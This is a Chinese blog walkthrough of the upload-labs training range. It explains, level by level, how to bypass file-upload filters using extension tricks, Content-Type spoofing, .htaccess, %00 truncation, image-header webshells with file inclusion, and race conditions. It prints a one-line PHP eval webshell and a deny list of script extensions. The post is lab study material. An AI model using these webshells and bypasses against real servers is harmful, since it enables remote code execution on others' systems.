赞
踩
目录
尝试上传.php文件,提示不成功。只能上传图片类型的文件。
分析原因:是因为前端js拦截了,我们先将php文件后缀修改成合法的格式(.gif ),在使用burpsuite抓包,再修改.php后缀。
我们可以再upload的相应包中看一下我们是否将文件上传成功了。
可以看到我们成功的将一句话木马上传至靶场的服务器。
POST[] 中是自己的密码。
到这里以及成功了,我们可以尝试使用蚁剑连接。
补充知识:
Content-Type 实体头部用于指示资源的MIME类型
media type ,在响应中,Content-Type标头告诉客户端实际返回的内容的内容类型。
第一步还是尝试上传php文件
发现与第一关的提示不同,不是根据文件的后缀进行识别。
分析源码:
发现这关只是对 content-type进行判断,在burp suite中,修改content-type为允许的类型就行了。
修改content-type
上传成功。同时蚁剑也可以连接成功!
尝试上传php文件,结合源码我们可以看出这关设置了文件后缀名黑名单,禁止上传后缀名为php的文件
我们尝试通过扩展名绕过,可以尝试phtml,php3,php4, php5, pht后缀名都可以绕过,但是前提是要在配置文件里面有这样的一句话
AddType application/x-httpd-php .php .phtml .phps .php1 .php4 .pht
这句话的意思是可以 .phtml .phps 等后缀名的文件执行 php程序
我们上传1.phtml 文件
上传成功
尝试使用蚁剑连接
分析源码:我们发现这一关的过滤比第三过更多了,使用第三关的方法是行不通了。
但是没有限制 .htaccess
补充知识:
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
上传内容为一下代码的文件,双引号内为你要上传的文件名。
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
但是这个后缀名使用的前提是我们要在apache
的httpd.conf
中将LoadModule rewrite_module modules/mod_rewrite.so
打开还有AllowOverride All
我们先上传 .htaccess 成功后再上传 .jpg文件
我们尝试上传 .hatccess 文件,但提示 “此文件类型不允许上传!” 说明过滤了该文件。
我们查看源码:
分析发现
第五关比第四关少了strtolower,这说明我们可以尝试大小写绕过。
$file_ext = strtolower($file_ext); //转换为小写
上传 .Php 文件,发现上传成功。
分析源码:
发现本关相比较前两关少了一步首尾去空的步骤,这样的话我们可以采取空格绕过
$file_ext = trim($file_ext); //首尾去空
我们上传 .php (点+php+空格) 的文件,上传成功。
分析源码:
相比较前几关,本关少了一下一步,这样的话就可以考虑从这里入手。
$file_name = deldot($file_name);//删除文件名末尾的点
利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过。
分析本关源码:
我们会发现本关少了去除字符串的一步,这里将是我们的入手点。
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
在php+windows的情况下:如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。利用windows特性,可在后缀名中加” ::$DATA”绕过。
分析源码:
先将首尾去空,又去除了::$DATA
又转换为小写,再删去末尾的点。这样一来我们构造文件名,使其经过过滤后得到的还是php
的文件名不就行了,所以就1.php. .
就可以绕过,也就是点+空格+点+空格
绕过
在分析源码前,我们可以不断地的通过burpsuite抓包模拟发送头信息,然后分析返回信息进行判断。
分析源码:
我们发现这里是将违规的后缀名全部替换成了空,但是他只替换一次,我们可以采用双写绕过。
比如 .php -> .pphphp
我们上传的文件名为: 10.pphphp
我们查看图片连接,会发现后缀名为 .php
分析源码:
白名单判断
但是$img_path这个变量直接是拼接的,所以我们可以使用%00
截断绕过。
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
%00
截断的条件是
php
版本要小于5.3.4 修改php.ini
的magic_quotes_gpc
为OFF
状态
修改save_path 路径,最后使用 %00 截断
分析源码:
用burp抓包,发现就是save_path post传参
用POST方式传参,应该也是00
截断,但是不会像GET方式那样会对%00进行解码。
由于无法自行解码所以我们需要在hex
中找到相对应的位置将数字修改为00
分析源码: $bin = fread($file, 2); //只读2字节
通过读取两个字节来确定文件类型,所以直接制作图片马即可
- function getReailFileType($filename){
- $file = fopen($filename, "rb");
- $bin = fread($file, 2); //只读2字节
- fclose($file);
- $strInfo = @unpack("C2chars", $bin);
- $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
- $fileType = '';
- switch($typeCode){
- case 255216:
- $fileType = 'jpg';
- break;
- case 13780:
- $fileType = 'png';
- break;
- case 7173:
- $fileType = 'gif';
- break;
- default:
- $fileType = 'unknown';
- }
- return $fileType;
- }
-
- $is_upload = false;
- $msg = null;
- if(isset($_POST['submit'])){
- $temp_file = $_FILES['upload_file']['tmp_name'];
- $file_type = getReailFileType($temp_file);
-
- if($file_type == 'unknown'){
- $msg = "文件未知,上传失败!";
- }else{
- $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
- if(move_uploaded_file($temp_file,$img_path)){
- $is_upload = true;
- } else {
- $msg = "上传出错!";
- }
- }
- }

13.jpg
- GIF89a
- <?php @eval($_POST['shell']);?>
然后上传,但是直接访问并不能将gif
当作php
来解析,因此还需要利用文件包含漏洞
写一个13.php
传入,再利用它来解析图片
- ##include.php
- <?php
- /*
- 本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
- */
- header("Content-Type:text/html;charset=utf-8");
- $file = $_GET['file'];
- if(isset($file)){
- include $file;
- }else{
- show_source(__file__);
- }
- ?>
再结合文件包含解析利用
upload/include.php?file=upload/图片名称
分析源码:
这一关通过getimagesize函数来获取图片信息,同样可以使用图片码绕过。
分析源码:
- function isImage($filename){
- //需要开启php_exif模块
- $image_type = exif_imagetype($filename);
- switch ($image_type) {
- case IMAGETYPE_GIF:
- return "gif";
- break;
- case IMAGETYPE_JPEG:
- return "jpg";
- break;
- case IMAGETYPE_PNG:
- return "png";
- break;
- default:
- return false;
- break;
- }
- }
-
- $is_upload = false;
- $msg = null;
- if(isset($_POST['submit'])){
- $temp_file = $_FILES['upload_file']['tmp_name'];
- $res = isImage($temp_file);
- if(!$res){
- $msg = "文件未知,上传失败!";
- }else{
- $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
- if(move_uploaded_file($temp_file,$img_path)){
- $is_upload = true;
- } else {
- $msg = "上传出错!";
- }
- }
- }

这里用到php_exif模块来判断文件类型,用图片马绕过,方法同pass-13
本人菜鸟请参考以下文章:
分析源码:
判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染。
- $is_upload = false;
- $msg = null;
- if (isset($_POST['submit'])){
- // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
- $filename = $_FILES['upload_file']['name'];
- $filetype = $_FILES['upload_file']['type'];
- $tmpname = $_FILES['upload_file']['tmp_name'];
-
- $target_path=UPLOAD_PATH.basename($filename);
-
- // 获得上传文件的扩展名
- $fileext= substr(strrchr($filename,"."),1);
-
- //判断文件后缀与类型,合法才进行上传操作
- if(($fileext == "jpg") && ($filetype=="image/jpeg")){
- if(move_uploaded_file($tmpname,$target_path))
- {
- //使用上传的图片生成新的图片
- $im = imagecreatefromjpeg($target_path);
-
- if($im == false){
- $msg = "该文件不是jpg格式的图片!";
- @unlink($target_path);
- }else{
- //给新图片指定文件名
- srand(time());
- $newfilename = strval(rand()).".jpg";
- $newimagepath = UPLOAD_PATH.$newfilename;
- imagejpeg($im,$newimagepath);
- //显示二次渲染后的图片(使用用户上传图片生成的新图片)
- $img_path = UPLOAD_PATH.$newfilename;
- @unlink($target_path);
- $is_upload = true;
- }
- } else {
- $msg = "上传出错!";
- }
-
- }else if(($fileext == "png") && ($filetype=="image/png")){
- if(move_uploaded_file($tmpname,$target_path))
- {
- //使用上传的图片生成新的图片
- $im = imagecreatefrompng($target_path);
-
- if($im == false){
- $msg = "该文件不是png格式的图片!";
- @unlink($target_path);
- }else{
- //给新图片指定文件名
- srand(time());
- $newfilename = strval(rand()).".png";
- $newimagepath = UPLOAD_PATH.$newfilename;
- imagepng($im,$newimagepath);
- //显示二次渲染后的图片(使用用户上传图片生成的新图片)
- $img_path = UPLOAD_PATH.$newfilename;
- @unlink($target_path);
- $is_upload = true;
- }
- } else {
- $msg = "上传出错!";
- }
-
- }else if(($fileext == "gif") && ($filetype=="image/gif")){
- if(move_uploaded_file($tmpname,$target_path))
- {
- //使用上传的图片生成新的图片
- $im = imagecreatefromgif($target_path);
- if($im == false){
- $msg = "该文件不是gif格式的图片!";
- @unlink($target_path);
- }else{
- //给新图片指定文件名
- srand(time());
- $newfilename = strval(rand()).".gif";
- $newimagepath = UPLOAD_PATH.$newfilename;
- imagegif($im,$newimagepath);
- //显示二次渲染后的图片(使用用户上传图片生成的新图片)
- $img_path = UPLOAD_PATH.$newfilename;
- @unlink($target_path);
- $is_upload = true;
- }
- } else {
- $msg = "上传出错!";
- }
- }else{
- $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
- }
- }

分析源码:
- $is_upload = false;
- $msg = null;
-
- if(isset($_POST['submit'])){
- $ext_arr = array('jpg','png','gif');
- $file_name = $_FILES['upload_file']['name'];
- $temp_file = $_FILES['upload_file']['tmp_name'];
- $file_ext = substr($file_name,strrpos($file_name,".")+1);
- $upload_file = UPLOAD_PATH . '/' . $file_name;
-
- if(move_uploaded_file($temp_file, $upload_file)){
- if(in_array($file_ext,$ext_arr)){
- $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
- rename($upload_file, $img_path);
- $is_upload = true;
- }else{
- $msg = "只允许上传.jpg|.png|.gif类型文件!";
- unlink($upload_file);
- }
- }else{
- $msg = '上传出错!';
- }
- }

这里是条件竞争,先将文件上传到服务器,然后判断文件后缀是否在白名单里,如果在则重命名,否则删除,因此我们可以上传1.php只需要在它删除之前访问即可,可以利用burp的intruder模块不断上传,然后我们不断的访问刷新该地址即可。
分析源码:
- //index.php
- $is_upload = false;
- $msg = null;
- if (isset($_POST['submit']))
- {
- require_once("./myupload.php");
- $imgFileName =time();
- $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
- $status_code = $u->upload(UPLOAD_PATH);
- switch ($status_code) {
- case 1:
- $is_upload = true;
- $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
- break;
- case 2:
- $msg = '文件已经被上传,但没有重命名。';
- break;
- case -1:
- $msg = '这个文件不能上传到服务器的临时文件存储目录。';
- break;
- case -2:
- $msg = '上传失败,上传目录不可写。';
- break;
- case -3:
- $msg = '上传失败,无法上传该类型文件。';
- break;
- case -4:
- $msg = '上传失败,上传的文件过大。';
- break;
- case -5:
- $msg = '上传失败,服务器已经存在相同名称文件。';
- break;
- case -6:
- $msg = '文件无法上传,文件不能复制到目标目录。';
- break;
- default:
- $msg = '未知错误!';
- break;
- }
- }
-
- //myupload.php
- class MyUpload{
- ......
- ......
- ......
- var $cls_arr_ext_accepted = array(
- ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
- ".html", ".xml", ".tiff", ".jpeg", ".png" );
-
- ......
- ......
- ......
- /** upload()
- **
- ** Method to upload the file.
- ** This is the only method to call outside the class.
- ** @para String name of directory we upload to
- ** @returns void
- **/
- function upload( $dir ){
-
- $ret = $this->isUploadedFile();
-
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
-
- $ret = $this->setDir( $dir );
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
-
- $ret = $this->checkExtension();
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
-
- $ret = $this->checkSize();
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
-
- // if flag to check if the file exists is set to 1
-
- if( $this->cls_file_exists == 1 ){
-
- $ret = $this->checkFileExists();
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
- }
-
- // if we are here, we are ready to move the file to destination
-
- $ret = $this->move();
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
-
- // check if we need to rename the file
-
- if( $this->cls_rename_file == 1 ){
- $ret = $this->renameFile();
- if( $ret != 1 ){
- return $this->resultUpload( $ret );
- }
- }
-
- // if we are here, everything worked as planned :)
-
- return $this->resultUpload( "SUCCESS" );
-
- }
- ......
- ......
- ......
- };

这关也存在条件竞争的问题,不过这题对文件后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否存在等等,因此可以通过不断上传图片马,由于条件竞争可能来不及重命名,从而上传成功。
分析源码:
发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过,方法同pass-12
- $is_upload = false;
- $msg = null;
- if (isset($_POST['submit'])) {
- if (file_exists(UPLOAD_PATH)) {
- $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
-
- $file_name = $_POST['save_name'];
- $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
-
- if(!in_array($file_ext,$deny_ext)) {
- $temp_file = $_FILES['upload_file']['tmp_name'];
- $img_path = UPLOAD_PATH . '/' .$file_name;
- if (move_uploaded_file($temp_file, $img_path)) {
- $is_upload = true;
- }else{
- $msg = '上传出错!';
- }
- }else{
- $msg = '禁止保存为该类型文件!';
- }
-
- } else {
- $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
- }
- }

分析源码:
$file = explode('.', strtolower($file));
通过源码发现该过滤方式是以explode()函数把字符串打散为数组,end() 函数将数组内部指针指向最后一个元素,并返回该元素的值(如果成功),这里是取post参数数组中的最后一个文件名。reset() 函数将内部指针指向数组中的第一个元素并输出。可控点为save_name。save_name[3]=conn19.php,save_name[5]=jpg,$ext=jpg过白名单,
reset($file)=conn19.php $file[1]=nul,就成功上传conn19.php.(多出个点但是windows自动去掉了没影响)。还可以尝试,1=conn19,2=php,3=jpg,或者Pass19的00截断,0=conn19.php(0x00),1=jpg
本人在学习过程中遇到了许多的BUG,无法解决,有点心态爆炸。但还是坚持将靶场打完,所以过程中缺少了许多实操的图片。
我参考多篇文章后写下这篇文章,所以这不能算是我的原创把。大家感兴趣的话可以点击以下连接查看参考文章:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。